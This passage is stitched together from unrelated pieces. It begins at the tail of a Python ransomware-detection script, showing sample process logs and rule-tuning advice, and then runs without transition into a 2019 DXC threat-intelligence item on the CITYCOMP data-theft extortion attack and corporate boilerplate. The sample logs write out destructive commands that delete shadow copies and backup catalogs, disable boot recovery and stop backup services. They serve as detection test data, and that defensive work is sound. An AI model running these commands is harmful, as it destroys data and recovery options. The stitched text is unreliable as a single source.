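SAMPLE_EVENTS = r"""
{"ts": "2019-05-05T02:14:03", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "services.exe", "cmd": "C:\\Windows\\System32\\cmd.exe /c \\\\DC01\\netlogon\\stop.bat"}
{"ts": "2019-05-05T02:14:09", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "net stop \"SQL Server (MSSQLSERVER)\" /y"}
{"ts": "2019-05-05T02:14:10", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "net stop MSExchangeIS /y"}
{"ts": "2019-05-05T02:14:11", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "sc stop VeeamBackupSvc"}
{"ts": "2019-05-05T02:14:12", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "taskkill /f /im sqlservr.exe"}
{"ts": "2019-05-05T02:14:13", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "net stop \"Acronis VSS Provider\" /y"}
{"ts": "2019-05-05T02:14:20", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "vssadmin.exe Delete Shadows /All /Quiet"}
{"ts": "2019-05-05T02:14:21", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "bcdedit /set {default} recoveryenabled No"}
{"ts": "2019-05-05T02:14:22", "host": "FIN-WS-17", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmd": "wbadmin delete catalog -quiet"}
{"ts": "2019-05-05T09:31:40", "host": "HR-WS-03", "user": "CORP\\jsmith", "parent": "explorer.exe", "cmd": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\jsmith\\report.docx\""}
{"ts": "2019-05-05T09:32:00", "host": "HR-WS-03", "user": "CORP\\jsmith", "parent": "cmd.exe", "cmd": "net stop spooler"}
"""

if __name__ == "__main__":
    for host, rule, cmd in triage(SAMPLE_EVENTS.splitlines()):
        print(f"{host:10} {rule:42} {cmd}")
```

The shadow-copy, bcdedit and wbadmin rules fire on one event and are cheap to deploy as-is; the burst rule is the one worth tuning per environment, because patch windows and cluster failovers also stop several services in quick succession, and the domain controller share rule assumes you maintain the DC list from directory data rather than hard-coding it as the example does.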

CITYCOMP breach exposes financial data of numerous enterprises

CITYCOMP, an IT supplier to multiple blue chip organizations, suffered a significant data-theft-for-ransom attack in late April. Details of how the attackers gained access to CITYCOMP are not in the public domain at this time.

Impact
The attackers stole significant amounts of data pertaining to key clients, including Oracle, Toshiba, Volkswagen and Airbus. The attackers attempted to extort CITYCOMP by threatening to release the data if a ransom was not paid. When CITYCOMP did not comply, the data was released on the dark web.
Source: Sophos

DXC perspective
Ransomware is only one type of extortion attack. Data theft for ransom remains a credible threat, often proving more lucrative for attackers than data theft for resale.

Learn more
Thank you for reading the Threat Intelligence Report. Learn more about security trends and insights from DXC Labs | Security:

DXC Labs | Security

DXC Labs delivers thought leadership technology prototypes to enable enterprises to thrive in the digital age.

DXC Labs | Security brings together our world-class advisors to develop strategic and architectural insights to reduce digital risk. DXC's Cyber Reference Architecture is at the heart of our research, providing clients with detailed guidance on methods to efficiently resolve the most challenging security problems. We help clients minimize risk while taking maximum advantage of the digital commons.

Learn more at www.dxc.technology/securitylabs



DXC in Security
Recognized as a leader in security services, DXC Technology helps clients prevent potential attack pathways, reduce cyber risk, and improve threat detection and incident response. Our expert advisory services and 24x7 managed security services are backed by 3,500+ experts and a global network of security operations centers.

DXC provides solutions tailored to our clients' diverse security needs, with areas of specialization in Intelligent Security Operations, Identity and Access Management, Data Protection and Privacy, Security Risk Management, and Infrastructure and Endpoint Security. Learn how DXC can help protect your enterprise in the midst of large-scale digital change. Visit www.dxc.technology/security.

Stay current on the latest threats


www.dxc.technology/threats

About DXC Technology


As the world’s leading independent, end-to-end IT services company, DXC Technology
(NYSE: DXC) leads digital transformations for clients by modernizing and integrating their
mainstream IT, and by deploying digital solutions at scale to produce better business
outcomes. The company’s technology independence, global talent, and extensive partner
network enable 6,000 private and public-sector clients in 70 countries to thrive on change.
DXC is a recognized leader in corporate responsibility. For more information, visit
www.dxc.technology and explore thrive.dxc.technology, DXC’s digital destination for
changemakers and innovators.

© Copyright 2019 DXC Technology Company. All rights reserved.